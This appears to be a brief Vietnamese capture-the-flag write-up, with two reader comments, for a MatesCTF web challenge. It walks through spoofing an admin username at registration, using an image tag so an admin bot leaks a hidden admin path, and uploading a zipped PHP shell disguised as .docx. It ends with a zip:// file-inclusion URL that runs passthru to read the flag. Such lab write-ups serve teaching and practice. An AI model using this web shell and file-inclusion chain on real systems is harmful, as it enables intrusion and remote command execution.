Challenge: http://weblab03.matesctf.org/index.php
mình ra bài này phút 91, sau khi giải kết thúc được 1 phút, rất là akay
#TeamSecrekt
Nhìn vào bài ta thấy 1 form chả quen gì……
Có 2 function login/register.
Reg thử 1 nick, để ý thì thấy username được tạo bởi email. Cụ thể là bỏ @ và đuôi phía sau, do đó ta có thể fake 1 nick admin bằng cách reg nick như sau:
email=adm@in.com
password=123456
—- bỏ @ và đuôi.com => username=admin
Tới đây login vào bạn sẽ thấy 1 tab hiện lên là tab quản trị, tuy nhiên click vào thì page này đã biến mất vì lí do bảo mật củ chuối nào đó, nhiệm vụ ở đây là tìm được link quản trị thật sự.
Để ý ta thấy có con bot admin luôn check bài ta đăng lên => lợi dụng điều đó import thẻ [img](host của mình)[/img] vào phần nội dung, khi bot admin view thì sẽ tự động load lên => lấy được thông tin header
Ok vậy là ta đã có được thư mục admin
http://weblab03.matesctf.org/s3crEt_AdM1n_pAg3/
Trong thư mục này ta có thể xem tất cả bài gửi lên + đính kèm
Nhớ lại bài owlur hồi codegate2015 xài zip:// để đọc file, mình tạo 1 file shell php, zip nó lại, đổi đuôi .zip thành .docx và gửi kèm theo bài => thành công
cuối cùng thì LFI chạy shell thôi 😀
http://weblab03.matesctf.org/index.php?page=zip:///var/www/html/upload/27a61c82e9f0c3408bbc32a60ec22dd7.docx#omg&0=passthru&1=cat%20flag.txt
không hiểu gì cả :3
LikeLike
cần học hỏi thêm
LikeLike